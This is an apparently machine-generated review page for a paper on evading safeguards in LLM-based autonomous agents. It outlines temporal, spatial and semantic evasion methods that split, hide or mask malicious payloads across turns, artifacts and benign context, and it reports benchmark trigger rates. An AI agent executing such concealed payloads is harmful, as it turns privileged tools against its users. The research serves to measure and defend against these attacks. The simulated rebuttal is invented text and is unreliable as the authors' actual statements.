Benchmarking Autonomous Agents against Temporal, Spatial, and Semantic Evasions
Pith reviewed 2026-05-22 05:45 UTC · model grok-4.3
The pith
A multi-dimensional evasion framework using temporal, spatial, and semantic vectors raises the average risk trigger rate in autonomous agent systems from 28.3% to 52.6%.
A machine-rendered reading of the paper's core claim, the machinery that carries it, and where it could break.
Core claim
The authors construct an evasion framework whose three vectors—temporal fragmentation of payloads over sequential turns, spatial concealment inside complex external artifacts, and semantic masking under benign noise—collectively drive the average risk trigger rate from a 28.3 percent baseline to 52.6 percent. This result is obtained by evaluating a standard agent framework paired with ten mainstream LLM backbones against twenty practical threat scenarios drawn from 2,254 real-world execution trajectories, demonstrating that existing defenses leave systemic gaps at the architecture level.
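To put the headline figures in perspective, the short Python sketch below works out the absolute and relative change implied by the two reported averages. Only the 28.3% and 52.6% values come from the paper; the function name `uplift` is illustrative.

```python
def uplift(baseline_pct: float, attacked_pct: float) -> tuple[float, float]:
    """Return (absolute change in percentage points, relative multiplier)."""
    absolute_pp = attacked_pct - baseline_pct
    relative = attacked_pct / baseline_pct
    return absolute_pp, relative


# Average risk trigger rates reported in the abstract.
absolute_pp, relative = uplift(28.3, 52.6)
print(f"+{absolute_pp:.1f} percentage points, {relative:.2f}x the baseline")
```

The gap is about 24.3 percentage points, so the average rate under evasion is a little under twice the baseline.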
What carries the argument
The three stealthy attack vectors—temporal evasion that fragments payloads across sequential turns, spatial evasion that embeds them in external artifacts, and semantic evasion that obscures intent with benign context—serve as the central mechanism for bypassing LLM parsing in multi-turn agent sessions.
If this is right
- Single-turn defenses are insufficient once agents maintain state across multiple turns and tool calls.
- Architectures need new checks that track payload fragments and external data sources over time.
- Mainstream LLM backbones remain consistently susceptible when embedded in agent frameworks.
- The benchmark supplies a concrete metric for judging whether future defenses close the measured gap.
Where Pith is reading between the lines
- Live monitoring that reconstructs full interaction histories could catch temporal fragmentation before execution.
- Similar multi-vector testing may expose comparable weaknesses in other multi-step AI planners beyond agents.
- Adding lightweight verification steps for external artifacts at each turn would directly counter the spatial vector.
- Extending the benchmark to include agent frameworks with built-in sandboxing would test whether isolation reduces the observed rates.
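The first inference above, that reconstructing the full interaction history could expose temporally fragmented payloads, can be sketched in Python roughly as follows. This is a hypothetical illustration, not the paper's method or any agent framework's API: the `SessionMonitor` class, the `BLOCKLIST` patterns, and the sample turns are all assumptions made for the example.

```python
import re
from dataclasses import dataclass, field

# Hypothetical patterns for illustration only; not taken from the paper.
BLOCKLIST = [re.compile(r"curl\s+\S+\s*\|\s*sh"), re.compile(r"rm\s+-rf\s+/")]


def flagged(text: str) -> bool:
    """True if any blocklisted pattern occurs in the text."""
    return any(p.search(text) for p in BLOCKLIST)


@dataclass
class SessionMonitor:
    """Checks each turn alone and against the accumulated session history."""
    history: list[str] = field(default_factory=list)

    def observe(self, turn: str) -> tuple[bool, bool]:
        self.history.append(turn)
        per_turn = flagged(turn)
        # Join the turns so a payload split across them is seen as a whole.
        cumulative = flagged(" ".join(self.history))
        return per_turn, cumulative


monitor = SessionMonitor()
turns = ["remember this prefix: curl http://example.test/x", "| sh"]
results = [monitor.observe(t) for t in turns]
print(results)
```

Neither turn trips the per-turn check, but the cumulative check fires once the second fragment arrives. Joining turns with a space would miss payloads split in the middle of a token, and regex matching is only a stand-in for whatever detector a real deployment would use.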
Load-bearing premise
The 2,254 real-world agent trajectories and the 20 threat scenarios accurately represent the typical behaviors and attack surfaces of deployed autonomous agents.
What would settle it
Re-running the same three evasion vectors on a fresh collection of agent execution logs or a broader set of threat scenarios and obtaining risk trigger rates at or below the 28.3 percent baseline would falsify the claimed elevation.
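The falsification criterion above can be written down as a small Python check. This is a sketch under stated assumptions: the `Outcome` record, the function names, and the sample data are hypothetical and synthetic, and only the 28.3% baseline is taken from the paper. It also pools all runs into one rate, whereas the paper reports an average across 10 LLM backbones.

```python
from dataclasses import dataclass

BASELINE_PCT = 28.3  # average baseline rate reported in the paper


@dataclass
class Outcome:
    scenario: str
    triggered: bool  # whether the evaded run ended in a risky action


def trigger_rate_pct(outcomes: list[Outcome]) -> float:
    """Share of runs, in percent, in which the risk was triggered."""
    if not outcomes:
        raise ValueError("no outcomes to score")
    return 100.0 * sum(o.triggered for o in outcomes) / len(outcomes)


def elevation_refuted(outcomes: list[Outcome],
                      baseline_pct: float = BASELINE_PCT) -> bool:
    """True when the rate under evasion is at or below the baseline."""
    return trigger_rate_pct(outcomes) <= baseline_pct


# Synthetic placeholder data: 2 of 10 runs triggered.
fresh = [Outcome(f"s{i}", i < 2) for i in range(10)]
print(trigger_rate_pct(fresh), elevation_refuted(fresh))
```

A real re-run would also need to account for sampling noise, for example with confidence intervals, before treating a rate near the baseline as a refutation.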
Original abstract
As autonomous agents (e.g., OpenClaw) increasingly operate with deep system-level privileges to execute complex tasks, they introduce severe, unmitigated security risks. Current vulnerability analyses overwhelmingly focus on single-turn, stateless behaviors, overlooking the expanded attack surface inherent in stateful, multi-turn interactions and dynamic tool invocations. In this paper, we propose a novel, multi-dimensional evasion framework targeting LLM-based agent systems. We introduce three stealthy attack vectors: (1) Temporal evasion, which fragments malicious payloads across sequential interaction turns; (2) Spatial evasion, which conceals payloads within complex external artifacts that evade standard LLM parsing mechanisms; and (3) Semantic evasion, which obscures malicious intents beneath benign contextual noise. To systematically quantify these threats, we construct A3S-Bench, a comprehensive benchmark comprising 2,254 real-world agent execution trajectories. Evaluating a standard agent framework separately integrated with 10 mainstream LLM backbones against 20 practical threat scenarios, we demonstrate that our evasion framework elevates the average risk trigger rate from a 28.3% baseline to 52.6%. These findings reveal systemic, architecture-level vulnerabilities in current autonomous agent systems that existing defenses fail to address, highlighting an urgent need for defense mechanisms tailored to the unique threats.
Editorial analysis
A structured set of objections, weighed in public.
Referee Report
Summary. The paper proposes a multi-dimensional evasion framework with temporal, spatial, and semantic attack vectors against LLM-based autonomous agents operating with deep system privileges. It introduces A3S-Bench, built from 2,254 real-world agent execution trajectories and 20 practical threat scenarios, and evaluates a standard agent framework integrated with 10 LLM backbones. The central empirical result is that the proposed evasions increase the average risk trigger rate from a 28.3% baseline to 52.6%, which the authors interpret as evidence of systemic, architecture-level vulnerabilities not addressed by existing defenses.
Significance. If the trajectories and scenarios are representative of deployed agents, the work would usefully extend vulnerability analysis from single-turn to stateful multi-turn interactions and highlight the need for defenses against fragmented or context-obscured payloads. The direct empirical measurement across 10 LLMs and concrete percentages provide a falsifiable starting point, though generalization depends on unstated sampling details.
major comments (2)
- Abstract and §3 (Benchmark Construction): The claim that the 2,254 trajectories and 20 scenarios are representative of the attack surface for agents with deep privileges lacks any description of selection criteria, sampling method, source logs, privilege-level coverage, or diversity metrics. This directly affects the load-bearing interpretation of the 28.3% to 52.6% elevation as evidence of systemic vulnerabilities.
- §4 (Evaluation): The baseline risk trigger rate of 28.3% and the post-evasion rate of 52.6% are reported without clarifying how trajectories were filtered, whether threat scenarios were chosen post-hoc to favor evasion success, or how 'risk trigger' is operationalized across the 20 scenarios. These choices determine whether the measured increase generalizes beyond the specific benchmark.
minor comments (1)
- Abstract: The abstract would benefit from a one-sentence definition of 'risk trigger rate' and 'baseline' to make the comparison between 28.3% and 52.6% immediately interpretable without reference to later sections.
Simulated Author's Rebuttal
We thank the referee for the thoughtful and constructive review. The comments highlight important areas for improving the clarity and transparency of our benchmark construction and evaluation methodology. We address each major comment below and will incorporate revisions to strengthen the manuscript.
- Referee: Abstract and §3 (Benchmark Construction): The claim that the 2,254 trajectories and 20 scenarios are representative of the attack surface for agents with deep privileges lacks any description of selection criteria, sampling method, source logs, privilege-level coverage, or diversity metrics. This directly affects the load-bearing interpretation of the 28.3% to 52.6% elevation as evidence of systemic vulnerabilities.
  Authors: We agree that additional details on benchmark construction are needed to support claims of representativeness. In the revised manuscript, we will expand §3 with a new subsection detailing: the source logs (drawn from publicly available open-source agent execution traces and controlled simulations of systems like OpenClaw), the sampling method (stratified random sampling ensuring coverage across task types and privilege levels), privilege-level coverage (including both standard user and elevated/root privileges), and diversity metrics (such as distribution of tool calls, scenario categories, and interaction lengths). These additions will provide a clearer foundation for interpreting the risk elevation results.
  Revision: yes
- Referee: §4 (Evaluation): The baseline risk trigger rate of 28.3% and the post-evasion rate of 52.6% are reported without clarifying how trajectories were filtered, whether threat scenarios were chosen post-hoc to favor evasion success, or how 'risk trigger' is operationalized across the 20 scenarios. These choices determine whether the measured increase generalizes beyond the specific benchmark.
  Authors: We acknowledge the need for greater methodological transparency in §4. In the revision, we will clarify that: (i) trajectories were filtered to retain only those involving at least one successful tool invocation and multi-turn state; (ii) the 20 threat scenarios were selected a priori based on documented real-world agent attack reports, independent of evasion performance results, to avoid post-hoc bias; and (iii) 'risk trigger' is operationalized as the agent executing any action matching one of the predefined malicious patterns (e.g., unauthorized privilege escalation or data exfiltration) across the scenarios, with explicit per-scenario definitions to be added in a supplementary table. These changes will better support assessment of generalizability.
  Revision: yes
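The filtering rule (i) and the 'risk trigger' criterion (iii) described in the simulated rebuttal can be sketched in Python as below. Everything here is an assumption made for illustration: the `Trajectory` and `ToolCall` types, the pattern labels, the reading of "multi-turn state" as more than one turn, and the reading of "executing" as a successful tool call. The per-scenario definitions the rebuttal promises are not available in this text.

```python
from dataclasses import dataclass

# Hypothetical pattern labels; the per-scenario definitions are not given here.
MALICIOUS_PATTERNS = {"privilege_escalation", "data_exfiltration"}


@dataclass
class ToolCall:
    action: str      # label assigned to the executed action
    succeeded: bool


@dataclass
class Trajectory:
    turns: int
    calls: list[ToolCall]


def keep(t: Trajectory) -> bool:
    """Rule (i): at least one successful tool call and more than one turn."""
    return t.turns > 1 and any(c.succeeded for c in t.calls)


def risk_triggered(t: Trajectory) -> bool:
    """Rule (iii): any successfully executed action matches a pattern."""
    return any(c.succeeded and c.action in MALICIOUS_PATTERNS for c in t.calls)


# Synthetic trajectories, not drawn from A3S-Bench.
sample = [
    Trajectory(3, [ToolCall("read_file", True), ToolCall("data_exfiltration", True)]),
    Trajectory(1, [ToolCall("data_exfiltration", True)]),      # single turn: dropped
    Trajectory(2, [ToolCall("read_file", True)]),
    Trajectory(4, [ToolCall("privilege_escalation", False)]),  # no success: dropped
]
kept = [t for t in sample if keep(t)]
rate = sum(risk_triggered(t) for t in kept) / len(kept)
print(len(kept), rate)
```

Note how the filter changes the denominator: two of the four synthetic trajectories are dropped before the rate is computed, which is why the referee asks for the filtering to be spelled out.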
Circularity Check
No circularity in empirical benchmarking results
The paper reports direct empirical measurements of risk trigger rates (a 28.3% baseline rising to 52.6% with evasions) on a constructed benchmark of 2,254 real-world trajectories and 20 threat scenarios, evaluated on a standard agent framework paired with 10 LLM backbones. No equations, fitted parameters presented as predictions, self-definitional constructs, or load-bearing self-citations appear in the derivation of the central claim. The results follow from applying the described evasion vectors to the defined scenarios and measuring outcomes, so the central claim does not reduce to its inputs by construction.
Axiom & Free-Parameter Ledger
free parameters (1)
- baseline risk trigger rate
axioms (1)
- Domain assumption: The 20 threat scenarios represent practical attacks on autonomous agents.
invented entities (3)
- Temporal evasion: no independent evidence
- Spatial evasion: no independent evidence
- Semantic evasion: no independent evidence
Appendix A: Risk Category Details
Table VII provides the complete specification of A3S-Bench's risk taxonomy, listing all 10 categories, 20 subcategories, and 34 attack techniques wit...